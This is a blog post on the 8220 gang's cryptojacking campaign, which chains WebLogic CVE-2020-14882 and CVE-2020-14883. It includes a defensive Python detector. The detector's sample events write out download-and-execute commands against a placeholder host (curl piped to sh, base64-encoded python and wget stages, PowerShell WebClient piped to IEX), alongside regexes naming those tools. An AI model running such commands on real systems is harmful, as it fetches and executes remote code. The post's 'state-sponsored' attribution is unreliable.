In a recent report published on December 14th, 2023, cybersecurity leader Imperva shed light on a series of attacks exploiting vulnerabilities in Oracle WebLogic servers. Imperva’s Threat Research team detected increased activity from a Chinese state-sponsored group known as the 8220 gang, targeting WebLogic installations to deploy cryptojacking malware.
First spotted in 2017, the 8220 gang is notorious for mass malware campaigns that abuse new vulnerabilities as they are discovered. Their latest campaigns take advantage of authentication flaws and remote code execution bugs in WebLogic to breach servers and install Monero miners.
Imperva’s report contains valuable details about the attack vectors utilized by 8220, as well as indicators of compromise that can help organizations detect intrusions. We will examine the specific WebLogic vulnerabilities exploited, the techniques employed to compromise systems, and the malware installed to steal compute resources for illicit cryptocurrency mining. Understanding these latest cyber threats is the first step toward protecting critical infrastructure.
A Short Note About the 8220 Gang
The 8220 gang, named after the port number frequently used in its campaigns, has been actively exploiting vulnerabilities to distribute cryptojacking malware since 2017. Security researchers attribute the group to Chinese state-sponsored hackers based on tactics, tools, and procedures.
Early operations targeted popular platforms like Drupal, Hadoop YARN, and Apache Struts, compromising systems to mine Monero. The group continues relying on recently disclosed bugs to breach servers from various manufacturers, including Oracle WebLogic, VMware, Redis, and Atlassian Confluence.
Once inside the network, the gang uses living-off-the-land binaries to move laterally and escalate privileges. A vast toolkit enables them to fingerprint systems, exploit additional weaknesses, and evade detection. Payloads often include coin miners tailored to the compromised architecture, configuration scripts, and backdoors for persistent access.
While the 8220 gang prioritizes stealth over destruction, the constant evolution of techniques makes them unpredictable and dangerous. Their operations generate substantial illicit profits through the theft of compute resources. Understanding this threat actor is key to protecting internet-facing infrastructure from server takeovers.
Vulnerabilities Found Being Exploited in Oracle WebLogic Servers
Imperva’s report details two critical Oracle WebLogic vulnerabilities chained together by the 8220 gang to achieve full remote code execution:
- CVE-2020-14883 – This flaw allows an authenticated attacker to send crafted input to execute arbitrary system commands. The bug exists in a component that handles administrative operations.
- CVE-2020-14882 – This flaw enables unauthenticated attackers to bypass authentication by sending maliciously crafted requests. Combining it with the previous RCE issue effectively eliminates the authentication requirement.
By chaining these two vulnerabilities, the 8220 gang can compromise Oracle WebLogic servers without needing any credentials. The attack flow involves sending HTTP requests to trigger CVE-2020-14882 and bypass auth first. Next, another request executes arbitrary code through CVE-2020-14883 to install malware.
These chained exploits enable the group to breach servers en masse with little effort. Organizations running vulnerable Oracle WebLogic installations are prime targets, especially those with internet-facing systems. Applying the latest security patches closes these exploitation vectors.
Imperva's analysis of how the 8220 gang exploits these vulnerabilities focuses on the group's methods and on the nature of the flaws they target. Here's a breakdown of the key technical details:
Method of Exploitation of CVE-2020-14883 & CVE-2020-14882 (Image Source: Imperva)
- The gang uses two different gadget chains for their attacks. One of these enables the loading of an XML file, which then contains a call to the other, enabling command execution on the operating system (OS).
- Different XML variations are used depending on the target OS. For Linux hosts, they attempt to download second-phase files using various methods such as cURL, wget, lwp-download, python urllib (base64 encoded), and a custom base64 encoded bash function.
- For Windows hosts, they use a simple PowerShell WebClient command to execute a downloaded PowerShell script.
- In another attack variant, they use a different gadget chain to execute Java code directly, without needing an externally hosted XML file. This injected Java code first determines the OS (Windows or Linux) and then executes the appropriate command strings.
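The second-stage download behaviour listed above is what a defender can look for on the host: WebLogic's Java process should not be spawning cURL, wget, lwp-download, python with urllib, base64-decoded bash stages, or PowerShell WebClient downloads. The script below is an added example written for this post, not code from Imperva or from the original report. It assumes process-creation telemetry arrives as JSON lines with `parent` and `cmd` fields (an assumption about the log shape), uses a constructed placeholder URL rather than any real indicator, and decodes base64 blobs in the command line so the same rules also catch the encoded python and bash variants the report describes.

```python
"""Flag download-and-execute child processes of the WebLogic JVM.

Added example for this post; the event format, host names and the
stage URL below are constructed placeholders, not real indicators.
"""
import base64
import json
import re

# Download primitives named in the Imperva write-up (Linux stage).
DOWNLOADER_RE = re.compile(r"\b(curl|wget|lwp-download)\b", re.IGNORECASE)
PYTHON_RE = re.compile(r"\bpython[0-9.]*\b", re.IGNORECASE)
URLLIB_RE = re.compile(r"\burllib\b", re.IGNORECASE)
# Base64-encoded python/bash stages: shell decode or Python b64decode call.
B64_DECODE_RE = re.compile(r"\bbase64\b\s+(-d|--decode)\b|\bb64decode\b", re.IGNORECASE)
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Windows stage: PowerShell WebClient download.
POWERSHELL_RE = re.compile(r"\bpowershell(\.exe)?\b", re.IGNORECASE)
WEBCLIENT_RE = re.compile(r"\bNet\.WebClient\b|\bDownload(String|File)\b", re.IGNORECASE)


def decoded_blobs(cmd):
    """Best-effort decode of base64 runs in a command line, keeping only
    results that look like text, so rules can run on the decoded stage."""
    out = []
    for m in B64_BLOB_RE.finditer(cmd):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            out.append(text)
    return out


def classify(cmd):
    """Return sorted tags describing which second-stage patterns a command matches."""
    tags = set()
    for text in [cmd] + decoded_blobs(cmd):
        if DOWNLOADER_RE.search(text):
            tags.add("downloader")
        if URLLIB_RE.search(text) and PYTHON_RE.search(cmd):
            tags.add("python-urllib")
        if B64_DECODE_RE.search(text):
            tags.add("base64-stage")
        if POWERSHELL_RE.search(text) and WEBCLIENT_RE.search(text):
            tags.add("powershell-webclient")
    return sorted(tags)


def is_weblogic_parent(parent):
    """True when the parent image is a JVM (or a path naming WebLogic)."""
    return bool(re.search(r"(^|[/\\])java(\.exe)?$", parent, re.IGNORECASE)) \
        or "weblogic" in parent.lower()


def scan(lines):
    """Scan JSON event lines; a download pattern spawned by the JVM is high severity."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        tags = classify(ev.get("cmd", ""))
        if not tags:
            continue
        sev = "high" if is_weblogic_parent(ev.get("parent", "")) else "medium"
        alerts.append({"host": ev.get("host"), "parent": ev.get("parent"),
                       "severity": sev, "tags": tags})
    return alerts


# Constructed sample telemetry (placeholder URL, not an indicator of compromise).
STAGE_URL = "http://stage.example.invalid"


def _b64(s):
    return base64.b64encode(s.encode()).decode()


SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"host": "wls-lin-01", "parent": "/usr/lib/jvm/java-11/bin/java",
     "cmd": f'sh -c "curl -fsSL {STAGE_URL}/x.sh | sh"'},
    {"host": "wls-lin-01", "parent": "/usr/lib/jvm/java-11/bin/java",
     "cmd": "python -c \"exec(__import__('base64').b64decode('"
            + _b64(f"import urllib.request as u;u.urlretrieve('{STAGE_URL}/x','/tmp/x')")
            + "'))\""},
    {"host": "wls-lin-02", "parent": "/opt/oracle/wlserver/jdk/bin/java",
     "cmd": 'bash -c "$(echo ' + _b64(f"wget -q {STAGE_URL}/x.sh -O /tmp/x.sh") + ' | base64 -d)"'},
    {"host": "wls-win-01", "parent": "C:\\Oracle\\jdk\\bin\\java.exe",
     "cmd": "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadString('"
            + STAGE_URL + "/x.ps1')|IEX\""},
    {"host": "build-07", "parent": "/usr/sbin/cron", "cmd": f"curl -s {STAGE_URL}/health"},
    {"host": "build-07", "parent": "/usr/sbin/cron", "cmd": "/usr/bin/apt-get update"},
]]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The parent-process check is what keeps this usable: a cron job running cURL is ordinary and only rates medium, while the same command launched by the WebLogic JVM is the post-exploitation pattern the report describes and rates high. Decoding base64 runs before matching is what turns the "base64 encoded" python and bash variants into the same alert as the plain cURL or wget case.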
Victims of Attack Campaign
According to Imperva’s telemetry, the 8220 gang does not focus on specific industries or countries when carrying out attacks. Recent campaigns have targeted healthcare, telecommunications, and financial services organizations in various regions like the United States, South Africa, Spain, Colombia, and Mexico.
The actors appear opportunistic in selecting which vulnerable WebLogic servers to exploit, lacking a defined targeting pattern. Any organization, regardless of size or sector, running outdated Oracle software is at potential risk. This demonstrates the importance of prompt patching and layered security controls to mitigate threats.
By taking advantage of any unpatched server they can compromise to deploy coin miners, the 8220 gang casts a wide net harvesting precious compute resources. Their broad attacks affect entities across both public and private sectors globally.
The 8220 gang exemplifies how threat actors now rapidly adopt innovations to outpace legacy defenses. Organizations must embrace emerging technologies like automation alongside pragmatic security to manage vulnerabilities proactively. Defending against persistent threats demands resilience through multi-layered monitoring, coordinated response, and machine-speed adaptation.
We hope this post helps you learn about the new cyber attacks on Oracle WebLogic Servers. Please share this post and help secure the digital world.